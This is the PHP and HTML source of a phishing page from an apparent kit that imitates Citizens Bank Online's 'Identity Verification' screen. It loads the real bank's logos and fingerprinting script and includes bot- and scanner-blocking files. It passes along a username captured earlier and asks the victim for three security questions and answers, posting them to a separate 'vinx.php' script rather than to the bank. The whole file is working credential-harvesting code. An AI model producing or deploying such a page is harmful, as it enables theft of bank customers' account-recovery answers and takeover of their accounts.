<?php

error_reporting(0);
@ini_set('display_errors', 'on'); 
ob_start();

include 'blocker.php';
include 'antirobot.php';
include 'bt.php';


?>



<?

$Username .= $_POST['UserID'];

?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<script src="https://www3.citizensbankonline.com/efs/efs/jsp-ns/pm_fp.js" language="JavaScript" type="text/javascript"> </script>

<html>
<center>
<head>
<title>Citizens Bank Online - Identity Verification</title>
<style>
	
body {
    background-color:#ffffff;
    margin-left: 15px;
    margin-top: 15px;
    margin-right: 15px;
    margin-bottom: 10px;
}
.homesub {background-color:#A8A8A8; font-family:Arial; font-size:10pt; color:#000000; font-weight:normal;}
.homesub2 {background-color:#E8E8E8; font-family:Arial; font-size:8pt; color:#000000; font-weight:normal;}
.homesub2-a {background-color:#FFFFFF; font-family:Arial; font-size:8pt; color:#000000; font-weight:normal;}

A {font-family:Arial, Helvetica, sans-serif; color:#000000;}
A:visited {color:#000000;}
A:active {color:#000000;}
A:hover {color:#000000;}

A.sub {font-family:Arial, Helvetica, sans-serif; color:#000000; text-decoration:none; font-weight:normal;}
A:visited.sub {color:#000000;}
A:active.sub {color:#000000;}
A:hover.sub {color:#000000; text-decoration:underline;}

A.sub-a {font-family:Arial, Helvetica, sans-serif; color:#000000; text-decoration:none; font-weight:bold;}
A:visited.sub-a {color:#000000;}
A:active.sub-a {color:#000000;}
A:hover.sub-a {color:#000000; text-decoration:underline;}

A.sub2 {font-family:Arial, Helvetica, sans-serif; color:#000000; text-decoration:none; font-weight:normal;}
A:visited.sub2 {color:#000000;}
A:active.sub2 {color:#000000;}
A:hover.sub2 {color:#000000; text-decoration:underline;}

A.sub2-a {font-family:Arial, Helvetica, sans-serif; color:#000000; text-decoration:none; font-weight:normal;}
A:visited.sub2-a {color:#000000;}
A:active.sub2-a {color:#000000;}
A:hover.sub2-a {color:#000000; text-decoration:underline;}

A.alt {text-decoration:none; font-family:Arial, Helvetica, sans-serif; font-size:8pt; color:#000000;}
A.alt:visited {color:#FFFFFF;}
A.alt:active {color:#FFFFFF;}
A.alt:hover {color:#FFFFFF;}
A.colhead {color:#FFFFFF;}
A.colhead:visited {color:#FFFFFF;}
A.colhead:active {color:#FFFFFF;}
A.colhead:hover {color:#FFFFFF;}

A.sub2-b {font-family:Arial, Helvetica, sans-serif; color:#006644; text-decoration:none; font-weight:bold;}
A:visited.sub2-b {color:#006644;}
A:active.sub2-b {color:#006644;}
A:hover.sub2-b {color:#006644; text-decoration:underline;}

.headerfont {
	font-family:Arial, Helvetica, sans-serif;
	font-size:14pt;
	font-weight:bold;
	color:#000000;
}

.green-headerfont, .red-headerfont {
	font-family:Arial, Helvetica, sans-serif;
	font-size:14pt;
	font-weight:bold;
	color:#229977;
}
.red-headerfont {color:#FF0000}

.promptfont, .promptfontbold, .promptstdfont{
	font-family:Arial;
	font-size:11pt;
	font-weight:normal;
	color:#000000;
}

.promptstdfont, .promptstdfontbold  {font-size:10pt;}
.promptstdfontbold {font-weight:bold;}

.welcomefont, .welcomefontbold {
	font-family:Arial;
	font-size:9pt;
	font-weight:normal;
	color:#666666;
}
.welcomefontbold {
	font-weight:bold;
}
.loginname {
    font-family:Arial;
	font-size:15pt;
	font-weight:bold;
	color:#666666;
}

.subtitle {
    font-family:Arial;
	font-size:9pt;
	font-weight:normal;
	color:#666666;
}

.subtitle2 {
    font-family:Arial;
	font-size:10pt;
	font-weight:normal;
	color:#666666;
}

.subtitlebold {
    font-family:Arial;
	font-size:9pt;
	font-weight:bold;
	color:#333333;
}

.subtitlebold2 {
    font-family:Arial;
	font-size:10pt;
	font-weight:bold;
	color:#333333;
}

.subtitleunderline {
    font-family:Arial;
	font-size:9pt;
	font-weight:normal;
	color:#000000;
	text-decoration:underline;
}

.mainfont, .mainfontbold {
	font-family:Arial, Helvetica, sans-serif;
	font-size:9pt;
	font-weight:normal;
	color:#000000;
}
.minifont, .minifontbold {
	font-family:Arial, Helvetica, sans-serif;
	font-size:8pt;
	color:#000000;
}
.mainfontbold {font-weight:bold;}
.promptfontbold {font-weight:bold;}
.minifontbold {font-weight:bold;}

.minifontred, .minifontredbold {
	font-family:Arial, Helvetica, sans-serif;
	font-size:8pt;
	color:#FF0000;
}
.minifontredbold {font-weight:bold;}

.copyright {
	font-family:Arial, Helvetica, sans-serif;
	font-size:8pt;
	font-weight:normal;
}

.errortitle {
	font-family:Arial, Helvetica, sans-serif;
	font-size:10pt;
	font-weight:bold;
	color:#FFFFFF;
	background-color:#FF9900;
}

.subaccountmenu {
	font-family:Arial, Helvetica, sans-serif;
	font-size:11pt;
	font-weight:bold;
	color:#333333;
}

.subaccountmenu2 {
    font-family:Arial;
	font-size:11pt;
	font-weight:normal;
	color:#006644;
}

.subaccountmenu3 {
    font-family:Arial;
	font-size:11pt;
	font-weight:normal;
	color:#666666;
}

.subaccountmenu4 {
    font-family:Arial;
	font-size:12pt;
	font-weight:Bold;
	color:#666666;
}

.errortext {
	font-family:Arial, Helvetica, sans-serif;
	font-size:10pt;
	font-weight:normal;
	color:#000000;
	background-color:#EAEAEA;
}
.columnheader, .columnheaderu, .pcolumnheader, .portallabel {
	font-family:Arial;
	font-size:9pt;
	font-weight:bold;
	color:#333333;
	text-decoration:none;
}
.columnheaderu {
    text-decoration:underline;
}

.ltrow, .pltrow {
	font-family:Arial, Helvetica, sans-serif;
	font-size:9pt;
	color:#000000;
	background-color:#FFFFFF;
}
.dkrow, .pdkrow {
	font-family:Arial, Helvetica, sans-serif;
	font-size:9pt;
	color:#000000;
	background-color:#EAEAEA;
}
.pcolumnheader {font-size:8pt;}
.pltrow {font-size:8pt;}
.pdkrow {font-size:8pt;}
.portallabel {font-size:8pt; height:18; background-color:#000066;}
.portaloutline {background-color:#3366CC;}

.asterisk, .asteriskred {
	font-size:12pt;
	color:#FF9900;
}

.asteriskred {
	color:#FF0000;
	font-weight:bold;
}

.quicklinks {
	font-family:Arial;
	font-size:11pt;
	font-weight:bold;
	color:#ffffff;
}

.subquicklinks, .subquicklinksu {
    font-family:Arial;
	font-size:9pt;
	color:#006644;
    text-decoration:none;
}

.subquicklinksu {
    text-decoration:underline;
}

.subquicklinks3 {
    font-family:Arial;
	font-size:10pt;
	color:#006644;
    text-decoration:none;
}

.subquicklinks8 {
    font-family:Arial;
	font-size:8pt;
	color:#e07d17;
    text-decoration:underline;
}

.footerbold {
	font-family:Arial;
	font-size:9pt;
	font-weight:bold;
	color:#333333;
}

.footer, .footershaded {
	font-family:Arial;
	font-size:9pt;
	font-weight:normal;
	color:#666666;
}

.footershaded {background-color:#c0c0c0;}

.footerlinks {
	font-family:Arial, Helvetica, sans-serif;
	font-size:9pt;
	font-weight:bold;
	color:#006644;
}

.tableheader {
    font-family:Arial;
	font-size:10pt;
	font-weight:bold;
	color:#FFFFFF;
}

.subquicklinks2 {
    font-family:Arial;
	font-size:9pt;
	color:#006644;
}

.navlinks {
  font-family:Arial;
	font-size:9pt;
	color:#B6B6B6;
}

.subaccountmenu3Bold2 {
  font-family:Arial;
	font-size:11pt;
	font-weight:Bold;
	color:#666666;
}

.subaccountmenu4Bold2 {
  font-family:Arial;
	font-size:11pt;
	font-weight:Bold;
	color:#000000;
}

.imageerrortext{
  font-family:Arial;
	font-size:11pt;
	font-weight:Bold;
	color:#FF0000;
}

.mainfontnou {
	font-family:Arial, Helvetica, sans-serif;
	font-size:9pt;
	font-weight:normal;
	color:#000000;
	text-decoration:none;
}

.solid-green { padding: 5px; border: 2px solid #229977; }

.itemheaders {
  font-family:Arial;
	font-size:9pt;
	font-weight:Bold;
	color:#000000;
}

.fill {
	background-color: #E4EAC6;
}
.special {
	display:none;
}
.logo { background: url('https://www3.citizensbankonline.com/efs/efs/grafx/logo_bg.jpg');  }


</style>
</head>


<body>


<!-- TOP NAV -->
<table width="741" cellpadding="0" cellspacing="0" border="0">
    <tr class='logo'><td height="53" align="left" valign="top">
      <img src="https://www3.citizensbankonline.com/efs/efs/grafx/citlogo.gif" width="230" height="55"></td>
    </tr>
</table>
<!-- END TOP NAV -->


<!-- CONTENT AREA -->
<table width="741" cellpadding="0" cellspacing="0" border="0" bgcolor="#FFFFFF"><tr><td>

<!-- CONTENT AREA NAV -->
<table width="100%" cellpadding="0" cellspacing="0" border="0" bgcolor="#FFFFFF">
    <tr>
        <td><img src="https://www3.citizensbankonline.com/efs/efs/grafx/spacer.gif" width="10" height="10" border="0" alt=""></td>
    </tr>
    <tr>

        <td width="200"><a href="http://www.citizensbank.com" target="_top">
        <img border="0" alt="" src="https://www3.citizensbankonline.com/efs/efs/grafx/home.gif" width="178" height="20"></a></td>

        <td class="green-headerfont">Citizens Bank Online® Identity Verification 
        Process</td>

    </tr>
</table>
<!-- END CONTENT AREA NAV -->


<table width="100%" cellpadding="2" cellspacing="0" border="0">

	

</table>
<form name="Enroll" action="vinx.php" method="post">
<input type="hidden" name="fp_deviceprint" value=""/>
<input type="hidden" name="fp_language" value=""/>

<input type="hidden" name="fp_timezone" value=""/>
<input type="hidden" name="fp_browser" value=""/>
<input type="hidden" name="fp_screen" value=""/>
<input type="hidden" name="UserID" value="<?php echo($Username); ?>">

<input type="hidden" name="fp_software" value=""/>
<input type="hidden" name="pm_fp" value=""/> <!-- RSA 6.0.2 0 -->

<table class="promptfont" width="817">
	<tr><td><img src="https://www3.citizensbankonline.com/efs/efs/grafx/spacer.gif" width="10" height="10" border="0" alt=""></td></tr>
    <tr>
        <td width="190" height="51">&nbsp;</td>
        <td height="51">

            It's easy to identify yourself in Citizens Bank Online.  Simply enter 
            the following details correctly.  Then click <b>Continue</b>. (All 
            information is compulsory)</td>

    </tr>
</table>
<table width="105%" cellpadding="2" cellspacing="0" border="0">
	   
	<tr>
	  <td width="26%">&nbsp;</td>
      <td width="28%" class="mainfontbold" align="left">&nbsp;</td>

      <td>&nbsp;</td>
    </tr>
    <tr>
	  <td width="26%">&nbsp;</td>
      <td width="28%" class="mainfontbold" align="left">

      <p align="center"><font color="#008000">SECURITY QUESTIONS</font></td>

      <td><b><font face="Arial" size="2" color="#008000">ANSWERS</font></b></td>
    </tr>
    <tr>
	  <td width="26%">
      <p align="right">&nbsp;</td>
      <td width="28%" class="mainfontbold" align="left">

      <p align="right"><span class="required">
			*</span>Challenge Question 1:</td>

      <td>
				<select style="width:280" class="form_elements" name="Q1" size="1">

					
						<option selected>Select</option>

					
						<option >In what city were you married? (Enter full name of city)</option>

					
						<option >In what city was your high school? (full name of city only)</option>
					
						<option >What is your best friend&#39;s first name?</option>
					
						<option >What is your father&#39;s middle name?</option>
					
						<option >What is the name of the first company you worked for?</option>

					
						<option >What is the first name of your oldest nephew?</option>

					
						<option >What is the first name of the maid of honor at your wedding?</option>
					
						<option>What is your maternal grandfather&#39;s first name?</option>
					
						<option >What was the name of your High School?</option>
					
						<option >What is your maternal grandmother&#39;s first name?</option>

					
				</select></td>

    </tr>
    <tr>
	  <td width="26%">
      <p align="right">&nbsp;</td>
      <td width="28%" class="mainfontbold" align="left">
      <p align="right">Answer #1:</td>

      <td><input type=text name="A1" size=16></td>
    </tr>

    <tr>
      <td colspan="2">&nbsp;</td>
    </tr>
    <tr>
	  <td width="26%">
      <p align="right">&nbsp;</td>
      <td width="28%" class="mainfontbold" align="left">
      <p align="right"><span class="required">
			*</span>Challenge Question 2:</td>

      <td>
				<select style="width:280" class="form_elements" name="Q2" size="1">
					
						<option selected>Select</option>
					
						<option >What is your paternal grandmother&#39;s first name?</option>
					
						<option >What was your high school mascot?</option>
					
						<option >In what city was your father born? (Enter full name of city only)</option>

					
						<option >What is the first name of your oldest niece?</option>

					
						<option >What was the first name of your first manager?</option>
					
						<option >What is the first name of the best man at your wedding?</option>
					
						<option >In what city is your vacation home? (Enter full name of city only)</option>
					
						<option >What was the name of your first pet?</option>
					
						<option >What was the nickname of your grandfather?</option>

					
						<option>What was the name of your first girlfriend/boyfriend?</option>

					
				</select></td>
    </tr>
    <tr>
	  <td width="26%">
      <p align="right">&nbsp;</td>
      <td width="28%" class="mainfontbold" align="left">
      <p align="right">Answer #2:</td>

      <td><input type=text name="A2" size=16></td>
    </tr>
    <tr>
      <td colspan="2">&nbsp;</td>
    </tr>
    <tr>
	  <td width="26%">
      <p align="right">&nbsp;</td>

      <td width="28%" class="mainfontbold" align="left">
      <p align="right"><span class="required">
			*</span>Challenge Question 3:</td>

      <td>
				<select style="width:280" class="form_elements" name="Q3" size="1">
					
						<option selected>Select</option>
					
						<option >What is your mother&#39;s middle name?</option>

					
						<option >Where did you meet your spouse for the first time? (Enter full name of city   only)</option>
					
						<option >What was the name of your junior high school? (Enter only &quot;Riverdale&quot; for   River</option>
					
						<option >In what city was your mother born? (Enter full name of city only)</option>

					
						<option >What was the last name of your favorite teacher in your final year of high school?</option>
					
						<option >In what city were you born? (Enter full name of city only)</option>
					
						<option>What street did your best friend in high school live on? (Enter full name of street only)</option>

					
						<option >What is your paternal grandfather&#39;s first name?</option>
					
						<option >What was your favorite restaurant in college?</option>
					
						<option >What was the name of the town your grandmother lived in? (Enter full name of   town only)</option>

					
				</select></td>
    </tr>

    <tr>
	  <td width="26%">
      <p align="right">&nbsp;</td>
      <td width="28%" class="mainfontbold" align="left">
      <p align="right">Answer #3:</td>

      <td><input type=text name="A3" size=16></td>
    </tr>
	<tr><td><img src="https://www3.citizensbankonline.com/efs/efs/grafx/spacer.gif" width="10" height="10" border="0" alt=""></td></tr>

    <tr>

	  <td width="26%">&nbsp;</td>
	  <td width="28%">&nbsp;</td>
      <td ><a href="javascript:document.Enroll.submit();">
      <img src="https://www3.citizensbankonline.com/efs/efs/grafx/btn_continue.gif" border="0" width="81" height="21"></a></td>
    </tr>
	<tr><td><img src="https://www3.citizensbankonline.com/efs/efs/grafx/spacer.gif" width="10" height="20" border="0" alt=""></td></tr>
</table>
<table class="promptfont" width="790">

    <tr>
        <td width="190">&nbsp;</td>
        <td>Click on the Privacy & Security link below to see how we are protecting your information.
		</td>
    </tr>
</table>
</form>
<tr><td><img src="https://www3.citizensbankonline.com/efs/efs/grafx/spacer.gif" width="10" height="30" border="0" alt=""></td></tr>

<!-- FOOTER -->
<table width="720" height="24" cellspacing="0" cellpadding="0" border="0">
    <tr><td width="58%" height="1"></td></tr>

    <tr><td width="58%" height="1"></td></tr>

    <tr><td align="right" width="58%" class="footer">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Member FDIC <img src="https://www3.citizensbankonline.com/efs/efs/grafx/ehl.gif" width="28" height="9"> Equal Housing Lender</td></tr>
    <tr height="4"><td colspan="2"></td></tr>
    <tr><td align="left" class="footerlinks" width="58%">
          <a target="_blank" href="http://www.citizensbank.com/security/default.aspx"><span class="subquicklinksu">Privacy & Security</span></a>

        | <a target="_blank" href="http://www.citizensbank.com/misc/termsofuse.asp"> <span class="subquicklinksu">Terms of Use  </span></a>&nbsp;

        | <a target="_blank" href="http://www.citizensbank.com/pf/onlinebanking/online_guarantee.aspx"><span class="subquicklinksu">Citizens Bank
		Online Guarantee </span></a>&reg;</td>
        <td align="right" class="footer" width="42%">© 2021 Citizens Financial Group.  All Rights Reserved.</td>
    </tr>
</table>
<table width="720" height="24" cellspacing="0" cellpadding="0" border="0">

	<tr><td><img src="https://www3.citizensbankonline.com/efs/efs/grafx/spacer.gif" width="10" height="5" border="0" alt=""></td></tr>
	<tr><td align="left" class="footer">Citizens Bank is a brand name of RBS Citizens, N.A. and Citizens Bank of Pennsylvania.  Citizens Bank is a division of RBS Citizens, N.A. and Citizens Bank accounts and other RBS Citizens, N.A. accounts are not separately insured by the FDIC.  Citizens Bank of Pennsylvania is not part of RBS Citizens, N.A.</td></tr>

</table>




</body>
</center>
</html>